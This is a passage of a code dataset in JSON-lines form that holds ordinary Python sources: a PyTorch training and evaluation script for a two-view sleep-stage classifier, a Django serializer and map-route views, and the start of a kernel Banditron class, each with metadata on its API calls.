DPCFusionClassifier(first_network=args.network, second_network=args.second_network,\n first_channels=args.channels_v1, second_channels=args.channels_v2,\n hidden_channels=16,\n feature_dim=args.feature_dim,\n num_class=5,\n use_dropout=use_dropout,\n use_l2_norm=use_l2_norm,\n use_batch_norm=use_final_bn, device=device)\n else:\n classifier = DPCFusionClassifier(first_network=args.second_network, second_network=args.network,\n first_channels=args.channels_v2, second_channels=args.channels_v1,\n hidden_channels=16,\n feature_dim=args.feature_dim,\n num_class=5,\n use_dropout=use_dropout,\n use_l2_norm=use_l2_norm,\n use_batch_norm=use_final_bn, device=device)\n classifier.cuda(device)\n\n new_state_dict = {}\n for key, param in state_dict.items():\n if 'encoder_q.' in key:\n key = key.replace('encoder_q.', 'encoder.')\n new_state_dict[key] = param\n elif 'sampler.' in key:\n new_state_dict[key] = param\n state_dict = new_state_dict\n\n classifier.load_state_dict(state_dict, strict=False)\n\n dataset = TwoDataset(dataset_v1, dataset_v2)\n finetune(classifier, dataset, device, it, args)\n\n # transform = TF.Compose(\n # [TF.Resize((64, 64)), TF.ToTensor()]\n # )\n # if (args.network == 'r1d' and not reverse) or (args.network == 'r2d' and reverse):\n # test_dataset_v1 = SleepDataset(args.data_path_v1, args.data_name, args.num_epoch, test_patients,\n # preprocessing=args.preprocessing)\n # test_dataset_v2 = SleepDatasetImg(args.data_path_v2, args.data_name, args.num_epoch, transform=transform,\n # patients=test_patients)\n # else:\n # test_dataset_v1 = SleepDatasetImg(args.data_path_v1, args.data_name, args.num_epoch, transform=transform,\n # patients=test_patients)\n # test_dataset_v2 = SleepDataset(args.data_path_v2, args.data_name, args.num_epoch, test_patients,\n # preprocessing=args.preprocessing)\n\n test_dataset = TwoDataset(test_dataset_v1, test_dataset_v2)\n\n scores, targets = evaluate(classifier, test_dataset, device, args)\n performance = get_performance(scores, targets)\n print(performance)\n return performance\n\n\ndef main_worker(run_id, device, train_patients, test_patients, args):\n assert os.path.isfile(args.load_path_v1), f'Invalid file path {args.load_path_v1}!'\n assert os.path.isfile(args.load_path_v2), f'Invalid file path {args.load_path_v2}!'\n\n state_dict_v1 = torch.load(args.load_path_v1)\n state_dict_v2 = torch.load(args.load_path_v2)\n\n print('[INFO] Loading training dataset...')\n if args.network == 'r1d':\n train_dataset_v1 = SleepDataset(args.data_path_v1, args.data_name, args.num_epoch, train_patients,\n preprocessing=args.preprocessing, return_idx=True)\n else:\n transform = TF.Compose(\n [TF.Resize((64, 64)), TF.ToTensor()]\n )\n train_dataset_v1 = SleepDatasetImg(args.data_path_v1, args.data_name, args.num_epoch, transform=transform,\n patients=train_patients, return_idx=True)\n print(train_dataset_v1)\n\n if args.second_network == 'r1d':\n train_dataset_v2 = SleepDataset(args.data_path_v2, args.data_name, args.num_epoch, train_patients,\n preprocessing=args.preprocessing, return_idx=True)\n else:\n transform = TF.Compose(\n [TF.Resize((64, 64)), TF.ToTensor()]\n )\n train_dataset_v2 = SleepDatasetImg(args.data_path_v2, args.data_name, args.num_epoch, transform=transform,\n patients=train_patients, return_idx=True)\n print(train_dataset_v2)\n\n print('[INFO] Loading evaluation dataset...')\n\n transform = TF.Compose(\n [TF.Resize((64, 64)), TF.ToTensor()]\n )\n if args.network == 'r1d':\n test_dataset_v1 = SleepDataset(args.data_path_v1, args.data_name, args.num_epoch, test_patients,\n preprocessing=args.preprocessing)\n test_dataset_v2 = SleepDatasetImg(args.data_path_v2, args.data_name, args.num_epoch, transform=transform,\n patients=test_patients)\n else:\n test_dataset_v1 = SleepDatasetImg(args.data_path_v1, args.data_name, args.num_epoch, transform=transform,\n patients=test_patients)\n test_dataset_v2 = SleepDataset(args.data_path_v2, args.data_name, args.num_epoch, test_patients,\n preprocessing=args.preprocessing)\n\n # The last iteration should train the first view\n assert args.iteration % 2 == 1\n\n # Refine pretraining\n for it in range(args.iteration):\n if it % 2 == 1:\n reverse = True\n else:\n reverse = False\n\n if reverse:\n print(f'[INFO] Iteration {it + 1}, train the second view...')\n else:\n print(f'[INFO] Iteration {it + 1}, train the first view...')\n\n if reverse:\n model = CoSleep(first_network=args.second_network, first_channels=args.channels_v2,\n second_network=args.network, second_channels=args.channels_v1,\n hidden_channels=16, feature_dim=args.feature_dim, pred_steps=args.pred_steps,\n temperature=args.temperature, m=args.mem_m, K=args.mem_k,\n num_prop=args.num_prop, lam=args.lam, lower_bound=args.lower_bound,\n upper_bound=args.upper_bound, use_temperature=False, device=device)\n else:\n model = CoSleep(first_network=args.network, first_channels=args.channels_v1,\n second_network=args.second_network, second_channels=args.channels_v2,\n hidden_channels=16, feature_dim=args.feature_dim, pred_steps=args.pred_steps,\n temperature=args.temperature, m=args.mem_m, K=args.mem_k,\n num_prop=args.num_prop, lam=args.lam, lower_bound=args.lower_bound,\n upper_bound=args.upper_bound, use_temperature=False, device=device)\n\n model.cuda(device)\n\n # Second view as sampler\n new_dict = {}\n new_state_dict_v2 = copy.deepcopy(state_dict_v2)\n for k, v in new_state_dict_v2.items():\n if 'encoder_q.' in k:\n k = k.replace('encoder_q.', 'sampler.')\n new_dict[k] = v\n new_state_dict_v2 = new_dict\n new_dict = {}\n # Remove queue\n for k, v in new_state_dict_v2.items():\n if 'queue' not in k:\n new_dict[k] = v\n new_state_dict_v2 = new_dict\n\n # First view as encoder k\n new_dict = {} # remove queue, queue_ptr\n new_state_dict_v1 = copy.deepcopy(state_dict_v1)\n for k, v in new_state_dict_v1.items():\n if 'queue' not in k:\n new_dict[k] = v\n new_state_dict_v1 = new_dict\n\n state_dict = {**new_state_dict_v1, **new_state_dict_v2}\n model.load_state_dict(state_dict, strict=False)\n\n print(f'Test for iteration [{it}]...')\n if reverse:\n test(model.state_dict(), train_dataset_v2, train_dataset_v1, test_dataset_v2, test_dataset_v1,\n reverse, device, it, args)\n else:\n test(model.state_dict(), train_dataset_v1, train_dataset_v2, test_dataset_v1, test_dataset_v2,\n reverse, device, it, args)\n\n if reverse:\n pretrain(model, train_dataset_v2, train_dataset_v1, device, run_id, it, args)\n else:\n pretrain(model, train_dataset_v1, train_dataset_v2, device, run_id, it, args)\n\n # Update the state dict\n state_dict_v1 = model.state_dict()\n state_dict_v1, state_dict_v2 = state_dict_v2, state_dict_v1\n\n # Saving\n if reverse:\n torch.save(model.state_dict(),\n os.path.join(args.save_path, f'cosleep_second_run_{run_id}_iter_{it}.pth.tar'))\n # test(model.state_dict(), train_dataset_v2, train_dataset_v1, test_patients, reverse, device, it, args)\n else:\n torch.save(model.state_dict(),\n os.path.join(args.save_path, f'cosleep_first_run_{run_id}_iter_{it}.pth.tar'))\n # test(model.state_dict(), train_dataset_v1, train_dataset_v2, test_patients, reverse, device, it, args)\n\n # Finetuning\n if args.finetune_mode == 'freeze':\n use_dropout = False\n use_l2_norm = True\n use_final_bn = True\n else:\n use_dropout = True\n use_l2_norm = False\n use_final_bn = False\n classifier = DPCFusionClassifier(first_network=args.network, second_network=args.second_network,\n first_channels=args.channels_v1, second_channels=args.channels_v2,\n hidden_channels=16, feature_dim=args.feature_dim, num_class=5,\n use_dropout=use_dropout, use_l2_norm=use_l2_norm, use_batch_norm=use_final_bn,\n device=device)\n classifier.cuda(device)\n\n state_dict = model.state_dict()\n new_state_dict = {}\n for key, param in state_dict.items():\n if 'encoder_q.' in key:\n key = key.replace('encoder_q.', 'encoder.')\n new_state_dict[key] = param\n elif 'sampler.' in key:\n new_state_dict[key] = param\n state_dict = new_state_dict\n classifier.load_state_dict(state_dict, strict=False)\n\n train_dataset = TwoDataset(train_dataset_v1, train_dataset_v2)\n finetune(classifier, train_dataset, device, None, args)\n torch.save(classifier.state_dict(), os.path.join(args.save_path, f'mc3_run_{run_id}_finetuned.pth.tar'))\n\n # Evaluation\n del train_dataset_v1, train_dataset_v2\n\n test_dataset = TwoDataset(test_dataset_v1, test_dataset_v2)\n\n scores, targets = evaluate(classifier, test_dataset, device, args)\n performance, _ = get_performance(scores, targets)\n with open(os.path.join(args.save_path, f'statistics_{run_id}.pkl'), 'wb') as f:\n pickle.dump({'performance': performance, 'args': vars(args), 'cmd': sys.argv}, f)\n performance.to_csv(os.path.join(args.save_path, 'performance.csv'), index=False)\n print(performance)\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n if args.seed is not None:\n setup_seed(args.seed)\n\n if args.wandb:\n with open('../data/wandb.txt', 'r') as f:\n os.environ['WANDB_API_KEY'] = f.readlines()[0]\n name = 'mc3'\n name += f'_fold{args.fold}'\n name += datetime.now().strftime('_%m-%d_%H-%M')\n wandb.init(project='MC3', group='MC3', name=name, config=args)\n\n devices = args.devices\n if devices is None:\n devices = list(range(torch.cuda.device_count()))\n\n if not os.path.exists(args.save_path):\n warnings.warn(f'The path {args.save_path} dost not existed, created...')\n os.makedirs(args.save_path)\n elif not args.resume:\n warnings.warn(f'The path {args.save_path} already exists, deleted...')\n shutil.rmtree(args.save_path)\n os.makedirs(args.save_path)\n\n print(f'[INFO] Using devices {devices}...')\n\n files = os.listdir(args.data_path_v1)\n patients = []\n for a_file in files:\n if a_file.endswith('.npz'):\n patients.append(a_file)\n # patients = np.asarray(patients)\n\n patients = sorted(patients)\n patients = np.asarray(patients)\n\n assert args.kfold <= len(patients)\n assert args.fold < args.kfold\n kf = KFold(n_splits=args.kfold)\n for i, (train_index, test_index) in enumerate(kf.split(patients)):\n if i == args.fold:\n print(f'[INFO] Running cross validation for {i + 1}/{args.kfold} fold...')\n train_patients, test_patients = patients[train_index].tolist(), patients[test_index].tolist()\n main_worker(i, devices[0], train_patients, test_patients, args)\n break\n", "sub_path": "main_cosleep.py", "file_name": "main_cosleep.py", "file_ext": "py", "file_size_in_byte": 25662, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.warn", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.backends", "line_number": 43, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.optim.AdamW", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 136, "usage_type": "name"}, {"api_name": "cosleep.data.TwoDataset", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 143, "usage_type": "call"}, {"api_name": "cosleep.utils.MultiNCELoss", "line_number": 146, "usage_type": "call"}, {"api_name": "tqdm.std.tqdm", "line_number": 159, "usage_type": "call"}, {"api_name": "cosleep.utils.mask_accuracy", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 194, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 221, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 223, "usage_type": "name"}, {"api_name": "torch.optim.AdamW", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 226, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 233, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.utils.data.SubsetRandomSampler", "line_number": 237, "usage_type": "call"}, {"api_name": "tqdm.std.tqdm", "line_number": 243, "usage_type": "call"}, {"api_name": "cosleep.utils.logits_accuracy", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 260, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 264, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 286, "usage_type": "call"}, {"api_name": "cosleep.model.DPCFusionClassifier", "line_number": 303, "usage_type": "call"}, {"api_name": "cosleep.model.DPCFusionClassifier", "line_number": 312, "usage_type": "call"}, {"api_name": "cosleep.data.TwoDataset", "line_number": 333, "usage_type": "call"}, {"api_name": "cosleep.data.TwoDataset", "line_number": 350, "usage_type": "call"}, {"api_name": "cosleep.utils.get_performance", "line_number": 353, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 360, "usage_type": "call"}, {"api_name": "os.path", "line_number": 360, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 362, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 363, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDataset", "line_number": 367, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 370, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 370, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 371, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 371, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 371, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDatasetImg", "line_number": 373, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDataset", "line_number": 378, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 381, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 381, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 382, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 382, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 382, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDatasetImg", "line_number": 384, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 390, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 390, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 391, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 391, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 391, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDataset", "line_number": 394, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDatasetImg", "line_number": 396, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDatasetImg", "line_number": 399, "usage_type": "call"}, {"api_name": "cosleep.data.SleepDataset", "line_number": 401, "usage_type": "call"}, {"api_name": "cosleep.model.CoSleep", "line_number": 420, "usage_type": "call"}, {"api_name": "cosleep.model.CoSleep", "line_number": 427, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 438, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 453, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 481, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 482, "usage_type": "call"}, {"api_name": "os.path", "line_number": 482, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 485, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 486, "usage_type": "call"}, {"api_name": "os.path", "line_number": 486, "usage_type": "attribute"}, {"api_name": "cosleep.model.DPCFusionClassifier", "line_number": 498, "usage_type": "call"}, {"api_name": "cosleep.data.TwoDataset", "line_number": 516, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 518, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 518, "usage_type": "call"}, {"api_name": "os.path", "line_number": 518, "usage_type": "attribute"}, {"api_name": "cosleep.data.TwoDataset", "line_number": 523, "usage_type": "call"}, {"api_name": "cosleep.utils.get_performance", "line_number": 526, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 527, "usage_type": "call"}, {"api_name": "os.path", "line_number": 527, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 528, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 528, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 529, "usage_type": "call"}, {"api_name": "os.path", "line_number": 529, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 541, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 544, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 544, "usage_type": "name"}, {"api_name": "wandb.init", "line_number": 545, "usage_type": "call"}, {"api_name": "torch.cuda.device_count", "line_number": 549, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 549, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 551, "usage_type": "call"}, {"api_name": "os.path", "line_number": 551, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 552, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 553, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 555, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 556, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 557, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 569, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 573, "usage_type": "call"}]} +{"seq_id": "15192807", "text": "from rest_framework import serializers\n\nfrom .models import PackageRelease, Project\nfrom .pypi import version_exists, latest_version\n\n\nclass PackageSerializer(serializers.ModelSerializer):\n class Meta:\n model = PackageRelease\n fields = [\"name\", \"version\"]\n extra_kwargs = {\"version\": {\"required\": False}}\n\n def validate(self, data):\n \n if \"version\" not in data:\n validated_data = latest_version(data[\"name\"])\n\n if validated_data == None:\n raise serializers.ValidationError()\n\n return validated_data\n \n if not version_exists(data[\"name\"], data[\"version\"]):\n raise serializers.ValidationError()\n\n validated_data = {\"name\": data[\"name\"], \"version\": data[\"version\"]}\n return validated_data\n\n\nclass ProjectSerializer(serializers.ModelSerializer):\n class Meta:\n model = Project\n fields = [\"name\", \"packages\"]\n\n packages = PackageSerializer(many=True)\n\n def create(self, validated_data):\n \n project = Project(name=validated_data[\"name\"])\n project.save()\n\n for package in validated_data[\"packages\"]:\n exist = PackageRelease.objects.filter(name=package[\"name\"], project_id=project.id)\n \n if exist:\n continue\n\n package_release = PackageRelease(\n project_id=project.id, \n name=package[\"name\"], \n version=package[\"version\"]\n )\n package_release.save()\n \n return project\n", "sub_path": "api/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 1588, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "models.PackageRelease", "line_number": 9, "usage_type": "name"}, {"api_name": "pypi.latest_version", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ValidationError", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 19, "usage_type": "name"}, {"api_name": "pypi.version_exists", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ValidationError", "line_number": 24, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 24, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Project", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Project", "line_number": 39, "usage_type": "call"}, {"api_name": "models.PackageRelease.objects.filter", "line_number": 43, "usage_type": "call"}, {"api_name": "models.PackageRelease.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "models.PackageRelease", "line_number": 43, "usage_type": "name"}, {"api_name": "models.PackageRelease", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "375390494", "text": "import json\nimport os\n\nfrom django.conf import settings\nfrom django.shortcuts import render_to_response, redirect, get_object_or_404\nfrom django.template.context_processors import csrf\nfrom django.http import JsonResponse\n\nfrom apps.routes.models import Route\nfrom apps.routes.forms.tracks_file import TracksFileForm\nfrom django.contrib.gis.geos import Polygon\nfrom apps.common.decorators import login_required\nfrom django.middleware.csrf import get_token\n\n\n@login_required\ndef tmp_load_data(request):\n Route.objects.all().delete()\n examples_dir = os.path.join(settings.BASE_DIR, '../data/example routes/')\n for filename in os.listdir(examples_dir):\n filepath = os.path.join(examples_dir, filename)\n Route.objects.route_from_file(filepath)\n return redirect('list-routes')\n\n\n@login_required\ndef create(request):\n route = Route.objects.create()\n return redirect('edit-route', route.id)\n\n\ndef api_route(request, pub_id):\n\n route = get_object_or_404(Route, pub_id=pub_id)\n se, nw = route.lines.boundary.coords\n route_details = {\n 'center': {\"coordinates\": [route.center[0], route.center[1]]},\n 'name': route.name,\n 'description': route.description,\n 'image_url': route.image_url,\n 'pub_id': pub_id,\n 'zoom_level': 1,\n 'lines': route.lines_zoom_1,\n 'bbox': {\n 'n': nw[0],\n 's': se[0],\n 'w': nw[1],\n 'e': se[1]\n },\n }\n return JsonResponse(route_details, safe=False)\n\n\ndef api_all(request):\n # bbox_coords = (xmin, ymin, xmax, ymax)\n # \"lat_lo,lng_lo,lat_hi,lng_hi\"\n bounds = request.GET['bounds'].split(\",\")\n bbox_coords = [float(val) for val in bounds]\n bbox = Polygon.from_bbox(bbox_coords)\n\n try:\n map_zoom = int(request.GET.get('zoom', \"20\"))\n except:\n map_zoom = 20\n zoom_level = {\n 11: 4,\n 12: 4,\n 13: 3,\n 14: 2,\n 15: 1,\n 16: 1,\n 17: 1,\n 18: 1,\n 19: 1,\n 20: 1,\n }.get(map_zoom, 5)\n zoom_field_name = \"lines_zoom_{}\".format(zoom_level)\n\n qs = Route.objects.filter(lines__bboverlaps=bbox)\n\n routes = []\n if qs.count() < 10:\n zoom_field_name = \"lines_zoom_1\"\n qs = qs.values(\"center\", \"name\", \"description\", \"image_url\", \"pub_id\", zoom_field_name)\n count = 0\n for route in qs:\n count += 1\n center = route[\"center\"]\n if center:\n center = {\"coordinates\": [center[0], center[1]]}\n\n routes.append({\n 'center': center,\n 'name': route[\"name\"],\n 'description': route[\"description\"],\n 'image_url': route[\"image_url\"],\n 'pub_id': route[\"pub_id\"],\n 'zoom_level': zoom_level,\n 'lines': json.loads(route[zoom_field_name])\n })\n return JsonResponse(routes, safe=False)\n\n\n@login_required\ndef upload(request):\n if request.method == \"POST\":\n form = TracksFileForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home')\n\n form = TracksFileForm()\n context = {'form': form}\n context.update(csrf(request))\n return render_to_response(\"upload_routes.html\", context)\n\n\n@login_required\ndef edit(request, route_id):\n route = Route.objects.get(id=route_id)\n route.center = 'POINT(-123.329773 48.407326)'\n context = {\n 'route': route,\n 'GOOGLE_MAPS_API_KEY': settings.GOOGLE_MAPS_API_KEY}\n return render_to_response(\"route/edit.html\", context)\n\n\n@login_required\ndef browse(request):\n context = {\n \"csrf_token\": get_token(request),\n \"GOOGLE_MAPS_API_KEY\": settings.GOOGLE_MAPS_API_KEY,\n }\n return render_to_response(\"home.html\", context)\n\n\n@login_required\ndef view(request, route_id):\n route = Route.objects.get(id=route_id)\n if not route.center:\n route.center = 'POINT(-123.329773 48.407326)'\n else:\n route.center = str(route.center).split(\";\")[1].replace(\" (\", \"(\")\n context = {\n 'route': route,\n 'GOOGLE_MAPS_API_KEY': settings.GOOGLE_MAPS_API_KEY}\n return render_to_response(\"route/view.html\", context)\n\n", "sub_path": "apps/routes/views/route.py", "file_name": "route.py", "file_ext": "py", "file_size_in_byte": 4171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "apps.routes.models.Route.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings.BASE_DIR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route.objects.route_from_file", "line_number": 22, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 22, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 16, "usage_type": "name"}, {"api_name": "apps.routes.models.Route.objects.create", "line_number": 28, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 28, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 26, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 34, "usage_type": "call"}, {"api_name": "apps.routes.models.Route", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Polygon.from_bbox", "line_number": 59, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Polygon", "line_number": 59, "usage_type": "name"}, {"api_name": "apps.routes.models.Route.objects.filter", "line_number": 79, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 79, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 101, "usage_type": "call"}, {"api_name": "apps.routes.forms.tracks_file.TracksFileForm", "line_number": 107, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 110, "usage_type": "call"}, {"api_name": "apps.routes.forms.tracks_file.TracksFileForm", "line_number": 112, "usage_type": "call"}, {"api_name": "django.template.context_processors.csrf", "line_number": 114, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 115, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 104, "usage_type": "name"}, {"api_name": "apps.routes.models.Route.objects.get", "line_number": 120, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 120, "usage_type": "name"}, {"api_name": "django.conf.settings.GOOGLE_MAPS_API_KEY", "line_number": 124, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 124, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 125, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 118, "usage_type": "name"}, {"api_name": "django.middleware.csrf.get_token", "line_number": 131, "usage_type": "call"}, {"api_name": "django.conf.settings.GOOGLE_MAPS_API_KEY", "line_number": 132, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 132, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 134, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 128, "usage_type": "name"}, {"api_name": "apps.routes.models.Route.objects.get", "line_number": 139, "usage_type": "call"}, {"api_name": "apps.routes.models.Route.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "apps.routes.models.Route", "line_number": 139, "usage_type": "name"}, {"api_name": "django.conf.settings.GOOGLE_MAPS_API_KEY", "line_number": 146, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 146, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 147, "usage_type": "call"}, {"api_name": "apps.common.decorators.login_required", "line_number": 137, "usage_type": "name"}]} +{"seq_id": "436989586", "text": "import numpy as np\nfrom enum import Enum\nimport sys, os\nsys.path.append(os.pardir)\nfrom banditron import Banditron\nimport warnings\nwarnings.simplefilter(\"error\", RuntimeWarning)\n\nclass kernel(Enum):\n gauss = 0\n polynomial = 1\n\n\nclass condition_error(Exception):\n pass\n\n\nclass Banditron_kernel(Banditron):\n def __init__(self, x, y, g = 1.0, B = 500, gamma = 0.5,\n test_interval:int=1000, normalize:bool = True):\n \"\"\"\n :param x:\n :param y:\n :param g:\n :param eta:\n :param test_interval:\n \"\"\"\n super().__init__(x, y, gamma=gamma, 